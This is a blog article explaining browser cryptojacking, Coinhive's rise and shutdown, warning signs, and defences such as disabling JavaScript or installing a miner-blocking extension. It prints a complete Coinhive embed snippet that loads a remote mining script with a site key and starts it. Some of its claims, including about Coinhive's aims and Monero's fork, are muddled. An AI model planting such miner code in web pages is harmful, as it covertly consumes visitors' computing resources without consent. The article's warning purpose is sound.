It’s always challenging for the crypto community to secure their bitcoins and other cryptocurrencies from hackers. In our previous article, we spoked about Punycode which makes you aware of malicious phishing websites and keeps you from landing on them. 

Here, in this article, I am going to introduce a technique called Crypto-jacking, which is used by hackers to steal CPU processing power. With stolen processing power, hackers used it to mine CPU based cryptocurrencies, similar to Monero[XMR].

What is cryptojacking?

Crypto-jacking is the process of illicitly borrowing a person’s processing power; hackers trick people into landing on a website that runs hidden cryptocurrency mining script [code].

The piece of code injected on the webpage utilizes the computational power in the background, while the user is surfing a particular page, the code initiates its action to stell the computing power to mine cryptocurrencies. There is an important point to be noted: Traditional hacks require to download or click on something, while the crypto-jacking process only needs you to browse the web page.

Effects of crypto-jacking

Now that we have an idea about what cryptojacking is, here are some indicators that you need to be aware of to avoid falling prey to it.

  • Device slows down
  • CPU fan starts making noises
  • Batteries begin to overheat
  • An increase in the consumption of RAM 

These are the signs that you will experience when you land on cryptojacked sites.

How cryptojacking works!

Let’s say (god forbid) that you and I fell prey to one of these cryptojacking schemes.
– The injected malware code in the malicious website will leech a little bit of CPU power from you, and a little bit from me, and just a little bit from tens and thousands of other people who clicked on the site as well. 

All this gathered mining power will end up creating a pool that will be larger than a group of fair GPU miners. In this situation, a mining pool with the highest amount of hash power will have a high level of probability to solve the block. In this case, miners who play fair and square, lose their opportunity to get rewarded. 

Even though cryptojacking is malicious, there are some significant points that differentiate it from other hacks.

  • Users are not directly losing money. They are losing CPU power.
  • Cryptojacking does not leave any long term damage.
  • It runs the CPU at maximum capacity for a short period of time.

That doesn’t sound so bad, does it? You read about the dangers of Punycode and cryptojacking might seem harmless, comparatively. Well, this sort of thinking led an organization called Coinhive to build a business out of cryptojacking. Let me tell you more about this case.


Javascript and Coinhive

A hacker can borrow the harmful source code ( shown below) from Coinhive to create a malicious website.

Here is the source code:

<script src=”https://coin-hive.com/lib/coinhive.min.js“></script><script>var miner = new CoinHive.Anonymous(‘B4ShXfNHJy3nEDclHBuc5i2bKJ3Sok8P’);

miner.start();

</script>

First, the code will initiate Coinhive’s javascript library; second, the hacker will have to add his wallet address [ B4ShXfNHJy3nEDclHBuc5i2bKJ3Sok8P ] to the code.

Once the malicious website is clicked on by a user who is unaware of cryptojacking, the webpage begins to steal the computational power, hackers illicitly earn cryptocurrencies which will be added to their wallet.

In most cases, cryptojacking is used to mine cryptocurrencies like Monero[XMR]; this is because its consensus algorithm is designed for CPU and GPU processing power.

So, how exactly does Coinhive work?

The basic idea behind Coinhive is to provide an alternative solution for ad revenue. Their vision is to offer hackers a means to steal your mining power, and consequently, your cryptocurrencies. 

For example:

Jarvis creates videos for his website. He decides that he doesn’t want to spend on advertising his website anymore, as it didn’t bring him enough revenue despite getting a lot of traffic. Jarvis turns to the dark side and resorts to cryptojacking.

He gets in touch with a hacker, Mr. X, who helps him merge Coinhive’s code with the source code. Once this is done, Jarvis begins to earn revenue via site visits in the form of cryptocurrencies. By resorting to cryptojacking, Jarvis doesn’t promote his video content and earn from it in an ethical way. Moreover, Jarvis will have to pay Coinhive 30% of his profits.

What about Mr. X, you ask? Well, as it goes, Jarvis and Mr. X made a deal based on a mutual understanding to gain from each other. These type of dealings have no fixed methods or relationships.

                                Image Source: Figure 1 | Malwarebytes doc

As Coinhive gets more popular in cyberspace, hackers even started injecting the code on multiple websites that do not belong to them. And it happened to be so, such that most of the hackers chose to mine Monero [XMR] (which was profitable at the time). 

Due to this (and a combination of scalability and interoperability issues), Monero [XMR] came up with the hard fork. In the fork process, the mining algorithm was completely changed which resulted in the company’s failure. This update came back to haunt Coinhive and it eventually shut down on March 8, 2019.

This might seem like a win for basic users. However, despite the Coinhive closing shop,   cryptojacking still persists in a lot of websites.

Not to worry though. I am going to provide you a solution to avoid falling prey to cryptojacking sites.

How to avoid Cryptojacking?

There are two possible solutions:

  • Turning off javascript (JS) in your browser
  • Installing ‘Miner Block’ chrome plugins

Turning off javascript in your browser: Normally, it is a popular habit among backend developers to turn off the JS in the browser. It helps them surpass the animated ads coded in javascript. Following this practice, you can avoid falling prey to cryptojacking websites. This is a very effective step as most of the mining malware is coded in javascript.

If you’d like to turn JavaScript off or on for all sites:

1. Click the Chrome menu on the top right-hand corner of your browser

2. Select Settings

3. Click Show advanced settings

4. Under the “Privacy” section, click the Content settings button.

5. In the “Javascript” section, select ” Do not allow any site to run JavaScript” or “Allow all sites to run JavaScript (recommended)”

Follow the mentioned procedures to turn javascript off or you can read the support document here. Moving further, let’s look at the plugin that helps you avoid cryptojacking.

Installing ‘Miner Block’ chrome plugin:

                                  Image Source: Figure 3 | Chrome Web Store

Miner Block is the plugin available in the Chrome Web Store, the extension helps to prevent browser-based cryptocurrency mining scripts from cryptojacking which is loaded from the backend of the webpage. This is similar to ad-blockers but it is far more focused on detecting mining scripts.

On another note, if you have already clicked on one of these cryptojacking sites, you can close the tab as soon as possible. However, I believe that prevention is better than cure. So, use the above-mentioned steps to avoid cryptojacking in the first place.

Wrapping it up!

Now that you learned about cryptojacking and how to avoid it, you are far better equipped to face these hacks in the cyberspace and actively go about your online habits.

If you’re interested in taking a closer look at cryptojacking websites, here is the link to experience the hack.

Leave a comment

My Newsletter

Sign Up For Updates & Newsletters